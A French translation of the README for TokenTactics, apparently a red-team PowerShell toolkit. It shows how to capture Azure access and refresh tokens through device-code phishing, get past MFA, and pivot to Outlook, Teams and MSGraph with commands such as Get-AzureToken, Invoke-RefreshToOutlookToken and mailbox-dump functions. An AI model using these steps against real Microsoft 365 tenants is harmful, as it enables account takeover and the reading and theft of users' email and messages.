
Ensemble d'outils de manipulation de jetons JWT Azure
Ensemble d'outils de manipulation des jetons Web JSON Azure (« JWT »)
Les jetons d'accès Azure vous permettent de vous authentifier auprès de certains points de terminaison en tant qu'utilisateur qui se connecte avec un code d'appareil. Même s'ils ont utilisé l'authentification multifacteur. Une fois que vous avez le jeton d'accès d'un utilisateur, il peut être possible d'accéder à certaines applications telles que Outlook, SharePoint, OneDrive, MSTeams et plus encore.
Par exemple, si vous avez un jeton Graph ou MSGraph, vous pouvez alors vous connecter à Azure et extraire les utilisateurs, groupes, etc. Vous pourriez ensuite, selon les politiques d'accès conditionnel, passer à un jeton Azure Core Management et exécuter AzureHound. Ensuite, passer à un jeton Outlook et lire/envoyer des e-mails ou MS Teams et lire/envoyer des messages !
Pour en savoir plus sur les types de jetons Azure : jetons d'accès de la plateforme d'identité Microsoft
Quelques exemples de requêtes vers des points de terminaison se trouvent dans le dossier resources. Il existe également un exemple de modèle de phishing pour le hameçonnage par code d'appareil.
Vous pouvez également utiliser ces jetons avec AAD Internals. Nous vous recommandons vivement de consulter cet outil incroyable.
Import-Module .\TokenTactics.psd1
Get-Help Get-AzureToken
Invoke-RefreshToSubstrateToken
Get-AzureToken -Client MSGraph
Une fois que l'utilisateur s'est connecté, le JWT vous sera présenté et sera enregistré dans la variable $response. Pour accéder au jeton d'accès, utilisez $response.access_token depuis votre fenêtre PowerShell pour afficher le jeton. Vous pouvez également afficher le jeton d'actualisation avec $response.refresh_token. Astuce : vous voudrez le jeton d'actualisation pour continuer à obtenir de nouveaux jetons d'accès ! Par défaut, les résultats de Get-AzureToken sont enregistrés dans TokenLog.log.
Get-AzureToken -Client DODMSGraph
Invoke-RefreshToOutlookToken -domain myclient.org -refreshToken 0.A
$OutlookToken.access_token
Connect-AzureAD -AadAccessToken $response.access_token -AccountId [email protected]
Une fois qu'un PRT a été capturé, authentifiez-vous avec roadrecon pour obtenir votre access_token et refresh_token. Lors de l'actualisation avec TokenTactics, utilisez ClientID 1b730954-1685-4b74-9bfd-dac224a7b894.
Invoke-RefreshToMSGraphToken -domain myclient.org -ClientId 1b730954-1685-4b74-9bfd-dac224a7b894 -refreshToken 0.A
Invoke-ClearToken -Token All
Get-Command -Module TokenTactics
CommandType Name Version Source
----------- ---- ------- ------
Function Invoke-ClearToken 0.0.2 TokenTactics
Function Invoke-DumpOWAMailboxViaMSGraphApi 0.0.2 TokenTactics
Function Invoke-ForgeUserAgent 0.0.2 TokenTactics
Function Get-AzureToken 0.0.2 TokenTactics
Function Get-TenantID 0.0.2 TokenTactics
Function Invoke-OpenOWAMailboxInBrowser 0.0.2 TokenTactics
Function Invoke-ParseJWTtoken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureCoreManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToDODMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMAMToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSManageToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSTeamsToken 0.0.2 TokenTactics
Function Invoke-RefreshToO365SuiteUXToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeAppsToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToOutlookToken 0.0.2 TokenTactics
Function Invoke-RefreshToSubstrateToken 0.0.2 TokenTactics
Function Invoke-RefreshToYammerToken 0.0.2 TokenTactics
Les méthodes de TokenTactics sont fortement influencées par les grandes recherches du Dr Nestori Syynimaa sur https://o365blog.com/.